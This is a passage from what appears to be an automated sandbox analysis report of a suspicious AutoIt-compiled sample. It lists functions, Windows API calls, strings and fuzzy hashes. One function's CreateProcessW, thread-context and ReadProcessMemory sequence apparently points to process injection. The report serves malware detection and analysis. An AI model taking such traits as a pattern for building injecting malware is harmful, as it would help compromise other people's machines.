InitializeCriticalSectionAndSpinCount.KERNEL32(0000000D,00000FA0), ref: 0064AE11

Memory Dump Source

Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd

Similarity

API ID: CriticalSection__calloc_crt$CallCountEnterFileFilterFunc@8InfoInitializeSleepSpinStartupType__calloc_impl__lock__mtinitlocknum
String ID:
API String ID: 1426640281-0
Opcode ID: ac94acdc9d604f403746cbbccc2335b8481db03c79d6e27d25e7bd15aa08c664
Instruction ID: 9b33dda174c4cc1f88a1e1582a0bd27abe15488637bf6f9c207334308cdea84d
Opcode Fuzzy Hash: ac94acdc9d604f403746cbbccc2335b8481db03c79d6e27d25e7bd15aa08c664
Instruction Fuzzy Hash: C781F771D45341AFDB14CFA8C8805ADBBF2AF06324B24525DE4B6AB3D1C7349843DB56

Function 014DEF90 Relevance: 10.7, APIs: 7, Instructions: 239
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileW.KERNELBASE(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000), ref: 014DF061
VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 014DF287

Memory Dump Source

Source File: 00000000.00000002.2063884765.00000000014DC000.00000040.00000020.00020000.00000000.sdmp, Offset: 014DC000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_14dc000_nfKqna8HuC.jbxd

Similarity

API ID: CreateFileFreeVirtual
String ID:
API String ID: 204039940-0
Opcode ID: e3e00bf9dbafeb2e33b0b1731302cb2fbf5584eb46f22b1b855d3d8c7a9348fe
Instruction ID: f861ec523099c0586f39dccc5eab9b119a37feaaa3378875bb157f5323f61c2d
Opcode Fuzzy Hash: e3e00bf9dbafeb2e33b0b1731302cb2fbf5584eb46f22b1b855d3d8c7a9348fe
Instruction Fuzzy Hash: C9A10974E00209EBDF24CFA4C8A4BEEBBB5BF48304F10815AE512BB291D7755A46CF54

Function 006249FB Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 73
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?), ref: 00624A1D
RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 006941DB
RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 0069421A
RegCloseKey.ADVAPI32(?), ref: 00694249

Strings

Software\AutoIt v3\AutoIt, xrefs: 00624A13
Include, xrefs: 006941D3, 00694212

Memory Dump Source

Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd

Similarity

API ID: QueryValue$CloseOpen
String ID: Include$Software\AutoIt v3\AutoIt
API String ID: 1586453840-614718249
Opcode ID: 56b246316a67a96a307c31b61226fd32905aaae25224f02ab05d660a8dd68158
Instruction ID: 4e01f4b93e76ab042bde3647956fa6ef9581cfb111574ef97f021bf058bf5cac
Opcode Fuzzy Hash: 56b246316a67a96a307c31b61226fd32905aaae25224f02ab05d660a8dd68158
Instruction Fuzzy Hash: 9C116DB5A00118BEEB00EBA4DD86DFF7BADEF05344F001069B502D7191EF70AE429B50

Function 006236B8 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 44
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 006236E6
CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00623707
ShowWindow.USER32(00000000,?,?,?,?,00623AA3,?), ref: 0062371B
ShowWindow.USER32(00000000,?,?,?,?,00623AA3,?), ref: 00623724

Strings

edit, xrefs: 00623701
AutoIt v3, xrefs: 006236DE, 006236E3, 006236E4

Memory Dump Source

Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd

Similarity

API ID: Window$CreateShow
String ID: AutoIt v3$edit
API String ID: 1584632944-3779509399
Opcode ID: 5569c738904f5e58a6ea76a7521f2e66f33eaf0dffb32806c604c1ce891b8bc7
Instruction ID: 0cce349fa07d7b5171a83de5cf75186412ed9fe3f60bcbfd26e21f04646e35b3
Opcode Fuzzy Hash: 5569c738904f5e58a6ea76a7521f2e66f33eaf0dffb32806c604c1ce891b8bc7
Instruction Fuzzy Hash: B4F03A705403D07AEB309B57AC88E672E7FD7C7F60B00101ABA04AE1A0C97118C1EAB0

Function 014DED30 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 157
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 014DEC20: Sleep.KERNELBASE(000001F4), ref: 014DEC31

CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 014DEE87

Strings

3Z459FPKQGUZ3VWR7RGY6PZ6W, xrefs: 014DEEEA, 014DEEED

Memory Dump Source

Source File: 00000000.00000002.2063884765.00000000014DC000.00000040.00000020.00020000.00000000.sdmp, Offset: 014DC000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_14dc000_nfKqna8HuC.jbxd

Similarity

API ID: CreateFileSleep
String ID: 3Z459FPKQGUZ3VWR7RGY6PZ6W
API String ID: 2694422964-500208108
Opcode ID: 78d6c4b8049ca2874e8db4ed85617a23264e3260141cc651ce32c9f66941d735
Instruction ID: 1cfeb38e96df20a113ab5788ab632c8dc10144278e5181fabde14fd1fe202224
Opcode Fuzzy Hash: 78d6c4b8049ca2874e8db4ed85617a23264e3260141cc651ce32c9f66941d735
Instruction Fuzzy Hash: 4A619330D04288DAEF11DBB4D858BEFBB75AF15304F044599E148BB2C1D7BA1B45CB66

Function 00624A30 Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 138COMMON

Download Yara Rule

APIs

Part of subcall function 00625374: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,006E1148,?,006261FF,?,00000000,00000001,00000000), ref: 00625392

Part of subcall function 006249FB: RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?), ref: 00624A1D

_wcscat.LIBCMT ref: 00692D80
_wcscat.LIBCMT ref: 00692DB5

Strings

\, xrefs: 00692DA2
\Include\, xrefs: 00624B0A
8!n, xrefs: 00624B1C

Memory Dump Source

Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd

Similarity

API ID: _wcscat$FileModuleNameOpen
String ID: 8!n$\$\Include\
API String ID: 3592542968-2639341556
Opcode ID: f159b9272170ecaf2b7b8e770d325436609c2d235b54c7a5e21883060efe5f76
Instruction ID: cc667b0e4712e3af8e51ed30daf9f57c3886cadf29149e40b058413aa969f9f1
Opcode Fuzzy Hash: f159b9272170ecaf2b7b8e770d325436609c2d235b54c7a5e21883060efe5f76
Instruction Fuzzy Hash: 68518FB14043929BC744EF59E8E18DAB7FFBE59300B40552EF7458B260EB709A48CF56

Function 006251AF Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 88windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 0062522F
_wcscpy.LIBCMT ref: 00625283
Shell_NotifyIconW.SHELL32(00000001,?), ref: 00625293
LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 00693CB0

Strings

Line: , xrefs: 00693CD9

Memory Dump Source

Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd

Similarity

API ID: IconLoadNotifyShell_String_memset_wcscpy
String ID: Line:
API String ID: 1053898822-1585850449
Opcode ID: f99e2ebb4d12126f0991527e089282b3242e7691ae774448f51a2dffdae0a4f0
Instruction ID: 1718f74159ad80f1506f2a33ce622f91aff7dd8b164b786c729996e06e75d8dc
Opcode Fuzzy Hash: f99e2ebb4d12126f0991527e089282b3242e7691ae774448f51a2dffdae0a4f0
Instruction Fuzzy Hash: 6131D071408BA0AED370EB60EC46FDE77DAAF45310F00451EF5868A191DB70A658CF9B

Function 00624139 Relevance: 7.3, APIs: 2, Strings: 2, Instructions: 258COMMON

Download Yara Rule

APIs

Part of subcall function 006241A9: LoadLibraryExW.KERNEL32(00000001,00000000,00000002,?,?,?,?,006239FE,?,00000001), ref: 006241DB

_free.LIBCMT ref: 006936B7
_free.LIBCMT ref: 006936FE

Part of subcall function 0062C833: __wsplitpath.LIBCMT ref: 0062C93E
Part of subcall function 0062C833: _wcscpy.LIBCMT ref: 0062C953
Part of subcall function 0062C833: _wcscat.LIBCMT ref: 0062C968
Part of subcall function 0062C833: SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,00000001,?,?,00000000), ref: 0062C978

Strings

Bad directive syntax error, xrefs: 006936E4
>>>AUTOIT SCRIPT<<<, xrefs: 00693491

Memory Dump Source

Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd

Similarity

API ID: _free$CurrentDirectoryLibraryLoad__wsplitpath_wcscat_wcscpy
String ID: >>>AUTOIT SCRIPT<<<$Bad directive syntax error
API String ID: 805182592-1757145024
Opcode ID: 1b7a7b8e8e795fb467dac07eda8750d6c250efbf3b0f7ee0575d319c20b5b058
Instruction ID: b07e8caa03eb47d678206c55887e399c9fb0f07f178cdba6f7a651c15c98f5ea
Opcode Fuzzy Hash: 1b7a7b8e8e795fb467dac07eda8750d6c250efbf3b0f7ee0575d319c20b5b058
Instruction Fuzzy Hash: 7E914B71910229AFCF44EFA4DC919EEB7BABF18310F104429F816AB391DB349A55CF94

Function 006240E5 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 64COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00693725
GetOpenFileNameW.COMDLG32 ref: 0069376F

Part of subcall function 0062660F: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,006253B1,?,?,006261FF,?,00000000,00000001,00000000), ref: 0062662F

Part of subcall function 006240A7: GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 006240C6

Strings

t3m, xrefs: 00693745
X, xrefs: 0069373E

Memory Dump Source

Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd

Similarity

API ID: Name$Path$FileFullLongOpen_memset
String ID: X$t3m
API String ID: 3777226403-1971450663
Opcode ID: a96dfc765ecd2f7bd5ddc8ede54d7202b402486738f34b076964d3ec45fbe86c
Instruction ID: 2fdd731565e8b084daec37561161a2af010123804d1b80cd3e19112e1a3d7ec6
Opcode Fuzzy Hash: a96dfc765ecd2f7bd5ddc8ede54d7202b402486738f34b076964d3ec45fbe86c
Instruction Fuzzy Hash: B621A171E006A89BCF419F98D8457EE7BFA9F49300F00401AE505AB341DFB45A898F6A

Function 006434AE Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 61COMMON

Download Yara Rule

APIs

__getstream.LIBCMT ref: 006434FE

Part of subcall function 00647C0E: __getptd_noexit.LIBCMT ref: 00647C0E

@_EH4_CallFilterFunc@8.LIBCMT ref: 00643539
__wopenfile.LIBCMT ref: 00643549

Strings

<G, xrefs: 006434CD, 006434F0, 006434FC

Memory Dump Source

Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd

Similarity

API ID: CallFilterFunc@8__getptd_noexit__getstream__wopenfile
String ID: <G
API String ID: 1820251861-2138716496
Opcode ID: 57813e7936015757f194dae2e34719a31bbba09b37cbc22c587d2f8367a10684
Instruction ID: 66b4c7eb566fdb1082acd7e432ae375defe3ac2adab6fc4b1a237be0bc1ae878
Opcode Fuzzy Hash: 57813e7936015757f194dae2e34719a31bbba09b37cbc22c587d2f8367a10684
Instruction Fuzzy Hash: E2112970A00326DFDB92BFB48C426AE36E7AF06350B158429F815CB3C1EB30CA1197B1

Function 0063D298 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 58registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.KERNELBASE(80000001,Control Panel\Mouse,00000000,00000001,00000000,00000003,00000000,80000001,80000001,?,0063D28B,SwapMouseButtons,00000004,?), ref: 0063D2BC
RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,0063D28B,SwapMouseButtons,00000004,?,?,?,?,0063C865), ref: 0063D2DD
RegCloseKey.KERNELBASE(00000000,?,?,0063D28B,SwapMouseButtons,00000004,?,?,?,?,0063C865), ref: 0063D2FF

Strings

Control Panel\Mouse, xrefs: 0063D2BA

Memory Dump Source

Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd

Similarity

API ID: CloseOpenQueryValue
String ID: Control Panel\Mouse
API String ID: 3677997916-824357125
Opcode ID: fcc1bd5d16d85411a9de481a03db6dd78d5be90b711cf6b57482024a00f38052
Instruction ID: 0b2c5d8a930eebaa5118379d695cd7a346184951b3e84ca88ddcda8907f50cd2
Opcode Fuzzy Hash: fcc1bd5d16d85411a9de481a03db6dd78d5be90b711cf6b57482024a00f38052
Instruction Fuzzy Hash: 71113975611208BFEB209FA4EC84EEF7BBDEF46744F104469F906D7210E631AE419BA0

Function 014DDC20 Relevance: 6.7, APIs: 4, Instructions: 720processthreadCOMMON

Download Yara Rule

APIs

CreateProcessW.KERNELBASE(?,00000000), ref: 014DE44D
Wow64GetThreadContext.KERNEL32(?,00010007), ref: 014DE471
ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 014DE493

Memory Dump Source

Source File: 00000000.00000002.2063884765.00000000014DC000.00000040.00000020.00020000.00000000.sdmp, Offset: 014DC000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_14dc000_nfKqna8HuC.jbxd

Similarity

API ID: Process$ContextCreateMemoryReadThreadWow64
String ID:
API String ID: 2438371351-0
Opcode ID: 75058a4f97cf2fcbd3f6bc15a6ffc08ef8895de4d25848071cc819695d886454
Instruction ID: 2b404c6ab0f2729dc71fbd4d8422721657875fcc5533563dd9216b77424c4943
Opcode Fuzzy Hash: 75058a4f97cf2fcbd3f6bc15a6ffc08ef8895de4d25848071cc819695d886454
Instruction Fuzzy Hash: 9262FC30A14658DBEB24CFA4C850BDEB776EF58700F1091A9D20DEB3A0E7759E81CB59

Function 0064365B Relevance: 6.2, APIs: 4, Instructions: 162COMMONLIBRARYCODE

Download Yara Rule

APIs

_memset.LIBCMT ref: 006436B7
_memcpy_s.LIBCMT ref: 00643729
__filbuf.LIBCMT ref: 006437AA
_memset.LIBCMT ref: 006437EE

Part of subcall function 00647C0E: __getptd_noexit.LIBCMT ref: 00647C0E

Memory Dump Source

Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd

Similarity

API ID: _memset$__filbuf__getptd_noexit_memcpy_s
String ID:
API String ID: 3877424927-0
Opcode ID: 25276d1f646da7b76298e578b8e053e7e3b96e54df01e447abe6ae266d0f960a
Instruction ID: 5e3efb0f2c1efe49c53dceb5b44821c3e415fd8c54eec9430642e6b7e76554a6
Opcode Fuzzy Hash: 25276d1f646da7b76298e578b8e053e7e3b96e54df01e447abe6ae266d0f960a
Instruction Fuzzy Hash: 0951C5B0A00326EBDB249FA988856AE77B3AF41320F24872DF875963D0D7719F518F44

Function 0066C396 Relevance: 6.2, APIs: 4, Instructions: 154COMMON

Download Yara Rule

APIs

Part of subcall function 00624517: _fseek.LIBCMT ref: 0062452F

Part of subcall function 0066C56D: _wcscmp.LIBCMT ref: 0066C65D
Part of subcall function 0066C56D: _wcscmp.LIBCMT ref: 0066C670

_free.LIBCMT ref: 0066C4DD
_free.LIBCMT ref: 0066C4E4
_free.LIBCMT ref: 0066C54F

Part of subcall function 00641C9D: RtlFreeHeap.NTDLL(00000000,00000000,?,00647A85), ref: 00641CB1
Part of subcall function 00641C9D: GetLastError.KERNEL32(00000000,?,00647A85), ref: 00641CC3

_free.LIBCMT ref: 0066C557

Memory Dump Source

Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd

Similarity

API ID: _free$_wcscmp$ErrorFreeHeapLast_fseek
String ID:
API String ID: 1552873950-0
Opcode ID: 7f252b61be53e347bf95bf8cf1f18cb687a3b92cb37ed7ac3162ce406380a335
Instruction ID: 4143781b3ad072bf3ca2fb928447d1750f927e5d29ee0d713e8f80aebfffc4d4
Opcode Fuzzy Hash: 7f252b61be53e347bf95bf8cf1f18cb687a3b92cb37ed7ac3162ce406380a335
Instruction Fuzzy Hash: B5515EB1A04218AFDF54DF64DC81BADBBBAEF48314F1000AEF259E7251DB715A908F58

Function 0063EB83 Relevance: 6.1, APIs: 4, Instructions: 65timewindowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 0063EBB2

Part of subcall function 006251AF: _memset.LIBCMT ref: 0062522F
Part of subcall function 006251AF: _wcscpy.LIBCMT ref: 00625283
Part of subcall function 006251AF: Shell_NotifyIconW.SHELL32(00000001,?), ref: 00625293

KillTimer.USER32(?,00000001,?,?), ref: 0063EC07
SetTimer.USER32(?,00000001,000002EE,00000000), ref: 0063EC16
Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00693C88

Memory Dump Source

Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd

Similarity

API ID: IconNotifyShell_Timer_memset$Kill_wcscpy
String ID:
API String ID: 1378193009-0
Opcode ID: ed38df0614d84eee9fd883ddddbe93e0701ad8e8cf1e63bf236075cea62ddfaa
Instruction ID: 10329fc150e952d4f3b1d061ca1c47df56be61bbe0f3bc3abee92eab18bbba62
Opcode Fuzzy Hash: ed38df0614d84eee9fd883ddddbe93e0701ad8e8cf1e63bf236075cea62ddfaa
Instruction Fuzzy Hash: 66212C70504B94AFEB329B24C859BEBBBEE9F05308F04104DE29F5A381C3712A84CB51

Function 0066C71A Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15COMMON

Download Yara Rule

APIs

GetTempPathW.KERNEL32(00000104,?), ref: 0066C72F
GetTempFileNameW.KERNELBASE(?,aut,00000000,?), ref: 0066C746

Strings

aut, xrefs: 0066C740

Memory Dump Source

Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd

Similarity

API ID: Temp$FileNamePath
String ID: aut
API String ID: 3285503233-3010740371
Opcode ID: 594705526ef34ce32d6efc3781c704de2384088eb4e2002037e1a294a6b41108
Instruction ID: 355e14ddb657fec5e5618acfd7987571b783a84fefb8c18e4c51143f8798a808
Opcode Fuzzy Hash: 594705526ef34ce32d6efc3781c704de2384088eb4e2002037e1a294a6b41108
Instruction Fuzzy Hash: 4BD05E7550030EABDB10AB90DC0EFCAB76D9700704F0001A17751A51B1DAB0E799CF55

Function 0067F8AE Relevance: 4.9, APIs: 3, Instructions: 385COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d8dba31ed7b06bb11adbbf2c815c7b5ce8458b006703a4fa8823d723f9248c85
Instruction ID: 22abec497477cc843de967f806c02eb8e79fe6ef64643242ac180d90601cdf87
Opcode Fuzzy Hash: d8dba31ed7b06bb11adbbf2c815c7b5ce8458b006703a4fa8823d723f9248c85
Instruction Fuzzy Hash: 66F158716083019FCB50DF24C881B6AB7E6BF88314F14892EF9999B392D770E945CF82

Function 00624FFC Relevance: 4.6, APIs: 3, Instructions: 77windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00625022
Shell_NotifyIconW.SHELL32(00000000,?), ref: 006250CB

Memory Dump Source

Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd

Similarity

API ID: IconNotifyShell__memset
String ID:
API String ID: 928536360-0
Opcode ID: 03c0ba1d1aa880b11092fe5e92e16ea531798a590a4c70055bec224b14bd0803
Instruction ID: 99b4c6d9a7871402618e64861e081056c623e03987b82c5df79f74da1ad03e34
Opcode Fuzzy Hash: 03c0ba1d1aa880b11092fe5e92e16ea531798a590a4c70055bec224b14bd0803
